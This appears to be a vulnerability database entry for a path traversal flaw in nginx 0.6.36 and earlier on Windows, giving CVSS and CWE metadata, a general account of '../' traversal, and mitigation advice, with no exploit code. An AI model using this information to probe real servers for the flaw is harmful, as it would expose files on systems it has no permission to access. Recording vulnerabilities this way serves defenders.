Vendor: nginx [engine x] http server
By: cp77fk4r
CVSS: 8.8 (HIGH)
CWE: 22 (Path Traversal)
Product Name: nginx [engine x] http server
Affected Version From: <= 0.6.36
Affected Version To: <= 0.6.36
Patch Exists: YES
Related CWE: N/A
CPE: nginx:nginx
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Win32
Year: 2010
nginx [engine x] http server <= 0.6.36 Path Traversal
A Path Traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and their variations, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration files and critical system files, limited only by the operating system's access controls. The attacker uses “../” sequences to move up towards the root directory, thus permitting navigation through the file system.
Mitigation:
Ensure that user input is validated and filtered to prevent path traversal attacks. Use a whitelist of accepted inputs to prevent malicious input from being accepted. Ensure that the web server is configured to deny access to files outside of the web root directory.